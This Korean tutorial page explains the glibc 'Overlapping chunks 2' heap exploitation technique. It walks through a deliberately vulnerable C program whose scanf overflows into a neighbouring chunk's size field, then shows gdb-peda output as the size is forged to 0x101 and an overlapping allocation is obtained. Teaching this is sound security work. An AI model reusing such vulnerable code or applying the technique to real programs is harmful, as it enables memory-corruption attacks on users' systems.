Page tree
Skip to end of metadata
Go to start of metadata

Excuse the ads! We need some help to keep our site up.

List

Conditions

  • 해당 기술은 다음과 같은 조건에서 동작합니다.
    • 공격자에 의해 Free Chunk을 생성 할 수 있어야 합니다.
    • 공격자에 의해 Free Chunk의 size영역에 값을 저장 할 수 있어야 합니다.

Exploit plan

  • 다음과 같은 방법으로 공격할 수 있습니다.
    • 5개의 Heap을 생성합니다.

    • 4번째 Heap영역을 해제합니다.
    • 2번째 Heap의 size 영역의 값을 아래와 같은 값으로 덮어씁니다.
      • 덮어쓸 값 : 2번째 Heap 크기(0x70 + 0x10) + 3번째 Heap 크기(0x70 + 0x10) + PREV_INUSE(1) = 0x101
    • 덮어쓴 값으로 Heap영역을 할당받습니다.
      • 할당받기 원하는 크기 : 0x70 + 0x70 = 0xE0
      • 2번째 Heap 영역의 시작주소를 할당 받습니다.
      • 이로 인해 3번재 영역에 값을 덮어쓸 수 있습니다.

Overlapping chunks vs Overlapping chunks 2

  • 해당 Exploitation의 차이점은 간단합니다.
    • Overlapping chunks : size 의 값을 수정해 Next chunk가 Top chunk를 가리킵니다.
    • Overlapping chunks 2 :size 의 값을 수정해 Next chunk가 Free chunk를 가리킵니다.
  • Ex)
    • Overlapping chunks
      • Overlapping chunks(Original) : buf1.nextChunk → buf2 chunk
      • Overlapping chunks(Modification) : buf1.nextChunk → Top chunk
    • Overlapping chunks2
      • Overlapping chunks2(Original) : buf1.nextChunk → buf2 chunk
      • Overlapping chunks2(Modification) : buf1.nextChunk → buf3 chunk

Example

Files

Source code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>

int main(){
  char *buf1 = malloc(112);
  char *buf2 = malloc(112);
  char *buf3 = malloc(112);
  char *buf4 = malloc(112);
  char *buf5 = malloc(112);

  free(buf4);

  scanf("%128s",buf1);

  free(buf2);
  char *buf6 = malloc(224);

  scanf("%224s",buf6);
}

Exploit flow

unsorted bin attack

Debugging

  • 다음과 같이 Break point를 설정합니다.
    • 0x400642 : free(buf4) 호출

    • 0x40065d : scanf("%128s",buf1) 호출 후 

    • 0x400669 : free(buf2) 호출 후

    • 0x400673 : malloc(224) 호출 후

Break points
gdb-peda$ b *0x0000000000400642
Breakpoint 1 at 0x400642
gdb-peda$ b *0x000000000040065d
Breakpoint 2 at 0x40065d
gdb-peda$ b *0x0000000000400669
Breakpoint 3 at 0x400669
gdb-peda$ b *0x0000000000400673
Breakpoint 4 at 0x400673
  • 다음과 같은 Heap 영역이 할당됩니다.
    • malloc(112) : 0x602010, 0x602090, 0x602110, 0x602190, 0x60210

    • buf4영역이 해제되면 해당 영역이 fastbinsY에 등록됩니다.
      • fastbinsY[6] : 0x602180

malloc(112) * 5 & free(0x602190)
gdb-peda$ r
Starting program: /home/lazenca0x0/Documents/Definition/OverlappingChunks2 


Breakpoint 1, 0x0000000000400642 in main ()
gdb-peda$ x/82gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x0000000000000000	0x0000000000000000
0x602020:	0x0000000000000000	0x0000000000000000
0x602030:	0x0000000000000000	0x0000000000000000
0x602040:	0x0000000000000000	0x0000000000000000
0x602050:	0x0000000000000000	0x0000000000000000
0x602060:	0x0000000000000000	0x0000000000000000
0x602070:	0x0000000000000000	0x0000000000000000
0x602080:	0x0000000000000000	0x0000000000000081
0x602090:	0x0000000000000000	0x0000000000000000
0x6020a0:	0x0000000000000000	0x0000000000000000
0x6020b0:	0x0000000000000000	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000000000000	0x0000000000000000
0x6020f0:	0x0000000000000000	0x0000000000000000
0x602100:	0x0000000000000000	0x0000000000000081
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
0x602130:	0x0000000000000000	0x0000000000000000
0x602140:	0x0000000000000000	0x0000000000000000
0x602150:	0x0000000000000000	0x0000000000000000
0x602160:	0x0000000000000000	0x0000000000000000
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000000	0x0000000000000081
0x602190:	0x0000000000000000	0x0000000000000000
0x6021a0:	0x0000000000000000	0x0000000000000000
0x6021b0:	0x0000000000000000	0x0000000000000000
0x6021c0:	0x0000000000000000	0x0000000000000000
0x6021d0:	0x0000000000000000	0x0000000000000000
0x6021e0:	0x0000000000000000	0x0000000000000000
0x6021f0:	0x0000000000000000	0x0000000000000000
0x602200:	0x0000000000000000	0x0000000000000081
0x602210:	0x0000000000000000	0x0000000000000000
0x602220:	0x0000000000000000	0x0000000000000000
0x602230:	0x0000000000000000	0x0000000000000000
0x602240:	0x0000000000000000	0x0000000000000000
0x602250:	0x0000000000000000	0x0000000000000000
0x602260:	0x0000000000000000	0x0000000000000000
0x602270:	0x0000000000000000	0x0000000000000000
0x602280:	0x0000000000000000	0x0000000000020d81
gdb-peda$ ni
0x0000000000400647 in main ()
gdb-peda$ x/82gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x0000000000000000	0x0000000000000000
0x602020:	0x0000000000000000	0x0000000000000000
0x602030:	0x0000000000000000	0x0000000000000000
0x602040:	0x0000000000000000	0x0000000000000000
0x602050:	0x0000000000000000	0x0000000000000000
0x602060:	0x0000000000000000	0x0000000000000000
0x602070:	0x0000000000000000	0x0000000000000000
0x602080:	0x0000000000000000	0x0000000000000081
0x602090:	0x0000000000000000	0x0000000000000000
0x6020a0:	0x0000000000000000	0x0000000000000000
0x6020b0:	0x0000000000000000	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000000000000	0x0000000000000000
0x6020f0:	0x0000000000000000	0x0000000000000000
0x602100:	0x0000000000000000	0x0000000000000081
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
0x602130:	0x0000000000000000	0x0000000000000000
0x602140:	0x0000000000000000	0x0000000000000000
0x602150:	0x0000000000000000	0x0000000000000000
0x602160:	0x0000000000000000	0x0000000000000000
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000000	0x0000000000000081
0x602190:	0x0000000000000000	0x0000000000000000
0x6021a0:	0x0000000000000000	0x0000000000000000
0x6021b0:	0x0000000000000000	0x0000000000000000
0x6021c0:	0x0000000000000000	0x0000000000000000
0x6021d0:	0x0000000000000000	0x0000000000000000
0x6021e0:	0x0000000000000000	0x0000000000000000
0x6021f0:	0x0000000000000000	0x0000000000000000
0x602200:	0x0000000000000000	0x0000000000000081
0x602210:	0x0000000000000000	0x0000000000000000
0x602220:	0x0000000000000000	0x0000000000000000
0x602230:	0x0000000000000000	0x0000000000000000
0x602240:	0x0000000000000000	0x0000000000000000
0x602250:	0x0000000000000000	0x0000000000000000
0x602260:	0x0000000000000000	0x0000000000000000
0x602270:	0x0000000000000000	0x0000000000000000
0x602280:	0x0000000000000000	0x0000000000020d81
gdb-peda$ p main_arena.fastbinsY[6]
$1 = (mfastbinptr) 0x602180
  • 다음과 같이 buf2의 size영역에 값을 덮어쓸 수 있습니다.
    • 해당 영역에 값을 다음과 같은 값으로 변경합니다.
      • 2번째 Heap 크기(0x70 + 0x10) + 3번째 Heap 크기(0x70 + 0x10) + PREV_INUSE(1) = 0x101
  • 즉, malloc() 함수가 buf2의 next chunk가 buf3이 아닌 buf4로 판단하게 됩니다.
Overwrite a 0x101 in the size area of Allocated Chunk
gdb-peda$ c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, 0x000000000040065d in main ()
gdb-peda$ x/82gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x4141414141414141	0x4141414141414141
0x602020:	0x4141414141414141	0x4141414141414141
0x602030:	0x4141414141414141	0x4141414141414141
0x602040:	0x4141414141414141	0x4141414141414141
0x602050:	0x4141414141414141	0x4141414141414141
0x602060:	0x4141414141414141	0x4141414141414141
0x602070:	0x4141414141414141	0x4141414141414141
0x602080:	0x4141414141414141	0x4141414141414141
0x602090:	0x0000000000000000	0x0000000000000000
0x6020a0:	0x0000000000000000	0x0000000000000000
0x6020b0:	0x0000000000000000	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000000000000	0x0000000000000000
0x6020f0:	0x0000000000000000	0x0000000000000000
0x602100:	0x0000000000000000	0x0000000000000081
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
0x602130:	0x0000000000000000	0x0000000000000000
0x602140:	0x0000000000000000	0x0000000000000000
0x602150:	0x0000000000000000	0x0000000000000000
0x602160:	0x0000000000000000	0x0000000000000000
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000000	0x0000000000000081
0x602190:	0x0000000000000000	0x0000000000000000
0x6021a0:	0x0000000000000000	0x0000000000000000
0x6021b0:	0x0000000000000000	0x0000000000000000
0x6021c0:	0x0000000000000000	0x0000000000000000
0x6021d0:	0x0000000000000000	0x0000000000000000
0x6021e0:	0x0000000000000000	0x0000000000000000
0x6021f0:	0x0000000000000000	0x0000000000000000
0x602200:	0x0000000000000000	0x0000000000000081
0x602210:	0x0000000000000000	0x0000000000000000
0x602220:	0x0000000000000000	0x0000000000000000
0x602230:	0x0000000000000000	0x0000000000000000
0x602240:	0x0000000000000000	0x0000000000000000
0x602250:	0x0000000000000000	0x0000000000000000
0x602260:	0x0000000000000000	0x0000000000000000
0x602270:	0x0000000000000000	0x0000000000000000
0x602280:	0x0000000000000000	0x0000000000020d81
gdb-peda$ p/x 0x80 + 0x80 + 0x1
$2 = 0x101
gdb-peda$ set *0x602088 = 0x101
gdb-peda$ set *0x60208c = 0x0
gdb-peda$ x/2gx 0x602080
0x602080:	0x4141414141414141	0x0000000000000101
gdb-peda$
  • 다음과 같이 buf2영역을 해제합니다.
    • 해당 영역 해제로 인해 0x100크기의 free chunk가 생성됩니다.
Free(0x602090)
gdb-peda$ c
Continuing.
Breakpoint 3, 0x0000000000400669 in main ()
gdb-peda$ x/82gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x4141414141414141	0x4141414141414141
0x602020:	0x4141414141414141	0x4141414141414141
0x602030:	0x4141414141414141	0x4141414141414141
0x602040:	0x4141414141414141	0x4141414141414141
0x602050:	0x4141414141414141	0x4141414141414141
0x602060:	0x4141414141414141	0x4141414141414141
0x602070:	0x4141414141414141	0x4141414141414141
0x602080:	0x4141414141414141	0x0000000000000101
0x602090:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x6020a0:	0x0000000000000000	0x0000000000000000
0x6020b0:	0x0000000000000000	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000000000000	0x0000000000000000
0x6020f0:	0x0000000000000000	0x0000000000000000
0x602100:	0x0000000000000000	0x0000000000000081
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
0x602130:	0x0000000000000000	0x0000000000000000
0x602140:	0x0000000000000000	0x0000000000000000
0x602150:	0x0000000000000000	0x0000000000000000
0x602160:	0x0000000000000000	0x0000000000000000
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000100	0x0000000000000080
0x602190:	0x0000000000000000	0x0000000000000000
0x6021a0:	0x0000000000000000	0x0000000000000000
0x6021b0:	0x0000000000000000	0x0000000000000000
0x6021c0:	0x0000000000000000	0x0000000000000000
0x6021d0:	0x0000000000000000	0x0000000000000000
0x6021e0:	0x0000000000000000	0x0000000000000000
0x6021f0:	0x0000000000000000	0x0000000000000000
0x602200:	0x0000000000000000	0x0000000000000081
0x602210:	0x0000000000000000	0x0000000000000000
0x602220:	0x0000000000000000	0x0000000000000000
0x602230:	0x0000000000000000	0x0000000000000000
0x602240:	0x0000000000000000	0x0000000000000000
0x602250:	0x0000000000000000	0x0000000000000000
0x602260:	0x0000000000000000	0x0000000000000000
0x602270:	0x0000000000000000	0x0000000000000000
0x602280:	0x0000000000000000	0x0000000000020d81
gdb-peda$ p main_arena.fastbinsY[6]
$1 = (mfastbinptr) 0x602180
gdb-peda$ p main_arena.bins[0]
$5 = (mchunkptr) 0x602080
gdb-peda$ p main_arena.bins[1]
$6 = (mchunkptr) 0x602080
gdb-peda$ 
  • 다음과 같이 buf3 영역을 덮어쓸 수 있는 영역을 할당 받습니다.
    • 할당 받은 Heap address : 0x602090
    • 할당 받은 Heap : 0x100
    • 할당 받은 Heap 영역 : 0x602090 ~ 0x602180
Malloc(224)
gdb-peda$ c
Continuing.

Breakpoint 4, 0x0000000000400673 in main ()
gdb-peda$ i r rax
rax            0x602090	0x602090
gdb-peda$ x/82gx 0x602000
0x602000:	0x0000000000000000	0x0000000000000081
0x602010:	0x4141414141414141	0x4141414141414141
0x602020:	0x4141414141414141	0x4141414141414141
0x602030:	0x4141414141414141	0x4141414141414141
0x602040:	0x4141414141414141	0x4141414141414141
0x602050:	0x4141414141414141	0x4141414141414141
0x602060:	0x4141414141414141	0x4141414141414141
0x602070:	0x4141414141414141	0x4141414141414141
0x602080:	0x4141414141414141	0x0000000000000101
0x602090:	0x00007ffff7dd38a8	0x00007ffff7dd38a8
0x6020a0:	0x0000000000000000	0x0000000000000000
0x6020b0:	0x0000000000000000	0x0000000000000000
0x6020c0:	0x0000000000000000	0x0000000000000000
0x6020d0:	0x0000000000000000	0x0000000000000000
0x6020e0:	0x0000000000000000	0x0000000000000000
0x6020f0:	0x0000000000000000	0x0000000000000000
0x602100:	0x0000000000000000	0x0000000000000081
0x602110:	0x0000000000000000	0x0000000000000000
0x602120:	0x0000000000000000	0x0000000000000000
0x602130:	0x0000000000000000	0x0000000000000000
0x602140:	0x0000000000000000	0x0000000000000000
0x602150:	0x0000000000000000	0x0000000000000000
0x602160:	0x0000000000000000	0x0000000000000000
0x602170:	0x0000000000000000	0x0000000000000000
0x602180:	0x0000000000000100	0x0000000000000081
0x602190:	0x0000000000000000	0x0000000000000000
0x6021a0:	0x0000000000000000	0x0000000000000000
0x6021b0:	0x0000000000000000	0x0000000000000000
0x6021c0:	0x0000000000000000	0x0000000000000000
0x6021d0:	0x0000000000000000	0x0000000000000000
0x6021e0:	0x0000000000000000	0x0000000000000000
0x6021f0:	0x0000000000000000	0x0000000000000000
0x602200:	0x0000000000000000	0x0000000000000081
0x602210:	0x0000000000000000	0x0000000000000000
0x602220:	0x0000000000000000	0x0000000000000000
0x602230:	0x0000000000000000	0x0000000000000000
0x602240:	0x0000000000000000	0x0000000000000000
0x602250:	0x0000000000000000	0x0000000000000000
0x602260:	0x0000000000000000	0x0000000000000000
0x602270:	0x0000000000000000	0x0000000000000000
0x602280:	0x0000000000000000	0x0000000000020d81
gdb-peda$ p main_arena.bins[1]
$7 = (mchunkptr) 0x7ffff7dd37b8 <main_arena+88>
gdb-peda$ p main_arena.bins[0]
$8 = (mchunkptr) 0x7ffff7dd37b8 <main_arena+88>
gdb-peda$ p main_arena.fastbinsY
$9 = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x602180, 0x0, 0x0, 0x0}
gdb-peda$ p main_arena.fastbinsY[6]
$10 = (mfastbinptr) 0x602180
gdb-peda$ 

Related information